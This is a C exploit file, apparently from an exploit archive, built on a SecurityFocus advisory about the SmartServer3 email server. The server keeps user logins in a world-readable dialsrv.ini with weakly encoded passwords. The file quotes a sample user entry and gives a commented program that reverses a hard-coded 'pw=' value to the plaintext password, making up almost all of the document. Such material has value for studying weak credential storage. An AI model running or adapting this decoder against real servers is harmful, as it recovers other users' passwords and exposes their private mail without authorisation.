/*
source: https://www.securityfocus.com/bid/1962/info
SmartServer3 is an email server designed for small networks.
A design error exists in SmartServer3 which enables an authenticated user to view other users' login information and possibly gain access to passwords. SmartServer3 by default installs in the C:\ProgramFiles\smartserver3/ directory and includes a configuration file called dialsrv.ini. This file is accessible by all Windows authenticated users and contains detailed user login information, including the encrypted password. However, SmartServer3 uses a weak encryption scheme which can easily be broken using a third-party utility.
Successful exploitation yields unauthorized access to private data.
The following example of user login information found in the dialsrv.ini file is provided by Steven Alexander <[email protected]>:
[USER1]
realname=Carl Jones
id=Carl
dir=CARL
pw=~:kC@nD3~:
extml=0
alertport=
alert=
UserActive=1
MailLimit=0
MailMAxWarn=0
MailMaxSize=20
*/
#include <stdio.h>
#define DIGIT 0
#define UPPER 1
#define LOWER 2
#define DEFAULT 3
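/*
 * Demonstrates why the "pw=" field in a SmartServer3 dialsrv.ini entry is
 * not a real cipher: each of the eight stored bytes is an offset from one
 * of three fixed per-position base values (digit / upper / lower), keyed
 * only on the first character of the user's "dir=" entry, so the stored
 * value is directly reversible.  Both inputs are hard-coded to the
 * advisory's worked example; there is no input handling.
 *
 * Returns 0.  The published listing used the non-standard `void main()`
 * and carried quoted-printable soft line breaks ("= " at end of line),
 * which do not compile; both are repaired here without touching the
 * decode logic.
 */
int main(void) {
    /* Base byte for each of the eight password positions, one row per
     * character class.  The DEFAULT row marks "this position is the
     * dir= character itself" (see the equality test in the loop). */
    static const unsigned char start_table[4][8] = {
        { 0x30, 0x4a, 0x7b, 0x53, 0x50, 0x7e, 0x54, 0x43 },
        { 0x41, 0x5b, 0x2e, 0x64, 0x61, 0x31, 0x65, 0x54 },
        { 0x60, 0x7a, 0x4d, 0x25, 0x22, 0x50, 0x26, 0x73 },
        { 0x7e, 0x3a, 0x6b, 0x43, 0x40, 0x6e, 0x44, 0x33 }
    };
    /* Just the first character from the DIR= entry ('F' in the example). */
    unsigned char uname = 0x46;
    /* The eight bytes of the pw= field being reversed. */
    unsigned char hash[8] = { 'E', '1', 'U', '0', 't', 'b', '*', '&' };
    unsigned char pass[8];
    unsigned char i;
    unsigned char range;

    /* A dir= entry starting with a digit shifts every hash byte up by one.
     * The published listing read `uname <= 39`, which can never hold for a
     * byte >= 0x30; 0x39 ('9') is the evident intent of a '0'..'9' test.
     * NOTE(review): irrelevant for the hard-coded 0x46 — confirm against a
     * user whose dir= begins with a digit before relying on it. */
    if (uname >= 0x30 && uname <= 0x39) {
        for (i = 0; i <= 7; i++) {
            hash[i] += 1;
        }
    }

    for (i = 0; i < 8; i++) {
        /* A hash byte equal to the DEFAULT base means the password holds
         * the dir= character at this position. */
        if (hash[i] == start_table[DEFAULT][i]) {
            pass[i] = uname;
            continue;
        }

        /* Classify the byte by which per-position window it falls in.  The
         * bounds are inclusive, as in the original (0x0a / 0x1a wide). */
        range = LOWER; /* hash values wrap to 0x21 after 0x7e */
        if (hash[i] >= start_table[DIGIT][i] &&
            hash[i] <= (start_table[DIGIT][i] + 0x0a)) {
            range = DIGIT;
        }
        if (hash[i] >= start_table[UPPER][i] &&
            hash[i] <= (start_table[UPPER][i] + 0x1a)) {
            range = UPPER;
        }
        if (hash[i] >= start_table[LOWER][i] &&
            hash[i] <= (start_table[LOWER][i] + 0x1a)) {
            range = LOWER;
        }

        if (range == DIGIT) {
            /* Positions 2 and 5 wrap past 0x7e; undo the wrap before
             * subtracting the base (0x5e = 0x7e - 0x21 + 1). */
            if (i == 2 || i == 5) {
                if (hash[i] < 0x73) {
                    hash[i] = hash[i] + 0x5e;
                }
            }
            pass[i] = (hash[i] - start_table[DIGIT][i]) + 0x30;
        }
        if (range == UPPER) {
            pass[i] = (hash[i] - start_table[UPPER][i]) + 0x41;
            /* The dir= character is skipped in the upper-case alphabet. */
            if (pass[i] >= uname) {
                pass[i] += 1;
            }
        }
        if (range == LOWER) {
            /* Same wrap correction as DIGIT, for positions 1 and 7. */
            if (i == 1 || i == 7) {
                if (hash[i] < 0x73) {
                    hash[i] = hash[i] + 0x5e;
                }
            }
            pass[i] = (hash[i] - start_table[LOWER][i]) + 0x61;
        }
    }

    printf("The password is:\n\t");
    for (i = 0; i < 8; i++) {
        printf("%c ", pass[i]);
    }
    printf("\n");
    return 0;
}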